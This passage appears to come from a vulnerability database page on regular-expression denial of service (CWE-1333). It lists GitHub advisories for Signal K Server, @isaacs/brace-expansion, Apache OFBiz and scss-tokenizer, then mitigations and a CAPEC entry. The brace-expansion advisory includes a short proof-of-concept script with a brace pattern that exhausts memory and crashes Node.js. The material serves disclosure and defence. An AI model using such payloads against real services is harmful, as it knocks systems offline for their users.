WebSocket connection can send the catastrophic payload, which permanently locks the main Node.js event loop. \n\n\u003cimg width=\"999\" height=\"153\" alt=\"Screenshot 2026-03-29 101820\" src=\"https://github.com/user-attachments/assets/54214d1c-252f-4533-ad02-14959ea2bed0\" /\u003e",
  "id": "GHSA-7gcj-phff-2884",
  "modified": "2026-04-21T17:17:00Z",
  "published": "2026-04-21T17:17:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7gcj-phff-2884"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39320"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/pull/2568"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Signal K Server has an Unauthenticated Regular Expression Denial of Service (ReDoS) via WebSocket Subscription Paths"
}

GHSA-7H2J-956F-4VF2

Vulnerability from github – Published: 2026-02-03 19:41 – Updated: 2026-02-05 00:36
VLAI
Summary
@isaacs/brace-expansion has Uncontrolled Resource Consumption
Details

Summary

@isaacs/brace-expansion is vulnerable to a Denial of Service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process.

Details

The vulnerability occurs because @isaacs/brace-expansion expands brace expressions without any upper bound or complexity limit. Expansion is performed eagerly and synchronously, meaning the full result set is generated before returning control to the caller.

For example, the following input:

{0..99}{0..99}{0..99}{0..99}{0..99}

produces:

100^5 = 10,000,000,000 combinations

This exponential growth can quickly overwhelm the event loop and heap memory, resulting in process termination.

Proof of Concept

The following script reliably triggers the issue.

Create poc.js:

const { expand } = require('@isaacs/brace-expansion');

const pattern = '{0..99}{0..99}{0..99}{0..99}{0..99}';

console.log('Starting expansion...');
expand(pattern);

Run it:

node poc.js

The process will freeze and typically crash with an error such as:

FATAL ERROR: JavaScript heap out of memory

Impact

This is a denial of service vulnerability. Any application or downstream dependency that uses @isaacs/brace-expansion on untrusted input may be vulnerable to a single-request crash.

An attacker does not require authentication and can use a very small payload to:

  • Trigger exponential computation
  • Exhaust memory and CPU resources
  • Block the event loop
  • Crash Node.js services relying on this library
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@isaacs/brace-expansion"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25547"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-03T19:41:15Z",
    "nvd_published_at": "2026-02-04T22:16:00Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`@isaacs/brace-expansion` is vulnerable to a Denial of Service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process.\n\n### Details\n\nThe vulnerability occurs because `@isaacs/brace-expansion` expands brace expressions without any upper bound or complexity limit. Expansion is performed eagerly and synchronously, meaning the full result set is generated before returning control to the caller.\n\nFor example, the following input:\n\n```\n{0..99}{0..99}{0..99}{0..99}{0..99}\n```\n\nproduces:\n\n```\n100^5 = 10,000,000,000 combinations\n```\n\nThis exponential growth can quickly overwhelm the event loop and heap memory, resulting in process termination.\n\n### Proof of Concept\n\nThe following script reliably triggers the issue.\n\nCreate `poc.js`:\n\n```js\nconst { expand } = require(\u0027@isaacs/brace-expansion\u0027);\n\nconst pattern = \u0027{0..99}{0..99}{0..99}{0..99}{0..99}\u0027;\n\nconsole.log(\u0027Starting expansion...\u0027);\nexpand(pattern);\n```\n\nRun it:\n\n```bash\nnode poc.js\n```\n\nThe process will freeze and typically crash with an error such as:\n\n```\nFATAL ERROR: JavaScript heap out of memory\n```\n\n### Impact\n\nThis is a denial of service vulnerability. Any application or downstream dependency that uses `@isaacs/brace-expansion` on untrusted input may be vulnerable to a single-request crash.\n\nAn attacker does not require authentication and can use a very small payload to:\n\n* Trigger exponential computation\n* Exhaust memory and CPU resources\n* Block the event loop\n* Crash Node.js services relying on this library",
  "id": "GHSA-7h2j-956f-4vf2",
  "modified": "2026-02-05T00:36:54Z",
  "published": "2026-02-03T19:41:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25547"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/brace-expansion"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@isaacs/brace-expansion has Uncontrolled Resource Consumption"
}

GHSA-7HXQ-2VP3-4XMJ

Vulnerability from github – Published: 2022-09-03 00:00 – Updated: 2022-09-10 00:00
VLAI
Details

Apache OFBiz up to version 18.12.05 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles URLs provided by external, unauthenticated users. Upgrade to 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12599

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-29158"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-02T07:15:00Z",
    "severity": "HIGH"
  },
  "details": "Apache OFBiz up to version 18.12.05 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles URLs provided by external, unauthenticated users. Upgrade to 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12599",
  "id": "GHSA-7hxq-2vp3-4xmj",
  "modified": "2022-09-10T00:00:30Z",
  "published": "2022-09-03T00:00:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29158"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/7k92rg1o4ql2yw3o0vttkcl2jhq7j928"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/09/02/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7MWH-4PQV-WMR8

Vulnerability from github – Published: 2022-07-02 00:00 – Updated: 2022-08-15 21:58
VLAI
Summary
Regular expression denial of service in scss-tokenizer
Details

All versions of the package scss-tokenizer prior to 0.4.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation() function, due to the usage of insecure regex.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.4.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "scss-tokenizer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-25758"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-06T21:07:13Z",
    "nvd_published_at": "2022-07-01T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "All versions of the package `scss-tokenizer` prior to 0.4.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `loadAnnotation()` function, due to the usage of insecure regex.",
  "id": "GHSA-7mwh-4pqv-wmr8",
  "modified": "2022-08-15T21:58:30Z",
  "published": "2022-07-02T00:00:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25758"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sasstools/scss-tokenizer/issues/45"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sasstools/scss-tokenizer/pull/49"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sasstools/scss-tokenizer/commit/a53b6f233e648cc01acbdd89c58786cf8ba56e35"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sasstools/scss-tokenizer"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2936782"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-SCSSTOKENIZER-2339884"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular expression denial of service in scss-tokenizer"
}

Mitigation
Architecture and Design

Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.

Mitigation
System Configuration

Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.

Mitigation
Implementation

Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.

Mitigation
Implementation

Limit the length of the input that the regular expression will process.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.